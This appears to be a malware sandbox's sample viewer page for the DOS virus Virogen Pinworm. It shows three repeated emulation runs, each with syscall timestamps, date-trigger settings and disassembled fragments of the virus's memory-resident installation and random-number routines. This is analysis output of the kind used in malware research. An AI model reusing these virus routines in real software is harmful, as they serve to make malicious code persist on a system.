Sample viewer

vx.netlux.org/Virus.DOS.Virogen.Pinworm.2585

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:10:07.492762429Z 250 PC: 12f1b | UNKNOWN!
2018-12-17T22:10:07.496126145Z 42 PC: 12f23 | Get date 0x12f23: cmp dl, 0xd
0x12f26: jne 0x12f2e
0x12f28: mov byte ptr cs:[bp + 0x80d], 1
0x12f2e: mov ax, es
0x12f30: dec ax
0x12f31: mov ds, ax
0x12f33: cmp byte ptr [0], 0x5a
0x12f38: jne 0x12f7f
0x12f3a: sub word ptr [3], 0x180
0x12f40: sub word ptr [0x12], 0x180
0x12f46: mov es, word ptr [0x12]
0x12f4a: push cs
0x12f4b: pop ds
0x12f4c: mov si, bp
0x12f4e: mov cx, 0x49b
0x12f51: xor di, di
0x12f53: rep movsd dword ptr es:[di], dword ptr [si]
0x12f55: xor ax, ax
0x12f57: mov ds, ax
0x12f59: push ds
2018-12-17T22:10:07.502026923Z 44 PC: 133b2 | Get time 0x133b2: mov word ptr [0x813], dx
0x133b6: pop ax
0x133b7: ret
0x133b8: push ax
0x133b9: mov ax, word ptr [0x813]
0x133bc: mov cx, 0x7ab5
0x133bf: mul cx
0x133c1: add ax, 0x3619
0x133c4: mov word ptr [0x813], ax
0x133c7: pop cx
0x133c8: mul cx
0x133ca: cmp dx, 0
0x133cd: jne 0x133d0
0x133cf: inc dx
0x133d0: ret
0x133d1: inc bx
0x133d2: dec ax
0x133d3: dec bx
0x133d4: dec sp
0x133d5: dec cx

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2251,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:45:18.809582719Z 250 PC: 12f1b | UNKNOWN!
2018-12-25T11:45:18.810769474Z 42 PC: 12f23 | Get date 0x12f23: cmp dl, 0xd
0x12f26: jne 0x12f2e
0x12f28: mov byte ptr cs:[bp + 0x80d], 1
0x12f2e: mov ax, es
0x12f30: dec ax
0x12f31: mov ds, ax
0x12f33: cmp byte ptr [0], 0x5a
0x12f38: jne 0x12f7f
0x12f3a: sub word ptr [3], 0x180
0x12f40: sub word ptr [0x12], 0x180
0x12f46: mov es, word ptr [0x12]
0x12f4a: push cs
0x12f4b: pop ds
0x12f4c: mov si, bp
0x12f4e: mov cx, 0x49b
0x12f51: xor di, di
0x12f53: rep movsd dword ptr es:[di], dword ptr [si]
0x12f55: xor ax, ax
0x12f57: mov ds, ax
0x12f59: push ds
2018-12-25T11:45:18.813488377Z 44 PC: 133b2 | Get time 0x133b2: mov word ptr [0x813], dx
0x133b6: pop ax
0x133b7: ret
0x133b8: push ax
0x133b9: mov ax, word ptr [0x813]
0x133bc: mov cx, 0x7ab5
0x133bf: mul cx
0x133c1: add ax, 0x3619
0x133c4: mov word ptr [0x813], ax
0x133c7: pop cx
0x133c8: mul cx
0x133ca: cmp dx, 0
0x133cd: jne 0x133d0
0x133cf: inc dx
0x133d0: ret
0x133d1: inc bx
0x133d2: dec ax
0x133d3: dec bx
0x133d4: dec sp
0x133d5: dec cx

{"DateBased":true,"Day":13,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2251,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:45:19.152646602Z 250 PC: 12f1b | UNKNOWN!
2018-12-25T11:45:19.153857082Z 42 PC: 12f23 | Get date 0x12f23: cmp dl, 0xd
0x12f26: jne 0x12f2e
0x12f28: mov byte ptr cs:[bp + 0x80d], 1
0x12f2e: mov ax, es
0x12f30: dec ax
0x12f31: mov ds, ax
0x12f33: cmp byte ptr [0], 0x5a
0x12f38: jne 0x12f7f
0x12f3a: sub word ptr [3], 0x180
0x12f40: sub word ptr [0x12], 0x180
0x12f46: mov es, word ptr [0x12]
0x12f4a: push cs
0x12f4b: pop ds
0x12f4c: mov si, bp
0x12f4e: mov cx, 0x49b
0x12f51: xor di, di
0x12f53: rep movsd dword ptr es:[di], dword ptr [si]
0x12f55: xor ax, ax
0x12f57: mov ds, ax
0x12f59: push ds
2018-12-25T11:45:19.156358723Z 44 PC: 133b2 | Get time 0x133b2: mov word ptr [0x813], dx
0x133b6: pop ax
0x133b7: ret
0x133b8: push ax
0x133b9: mov ax, word ptr [0x813]
0x133bc: mov cx, 0x7ab5
0x133bf: mul cx
0x133c1: add ax, 0x3619
0x133c4: mov word ptr [0x813], ax
0x133c7: pop cx
0x133c8: mul cx
0x133ca: cmp dx, 0
0x133cd: jne 0x133d0
0x133cf: inc dx
0x133d0: ret
0x133d1: inc bx
0x133d2: dec ax
0x133d3: dec bx
0x133d4: dec sp
0x133d5: dec cx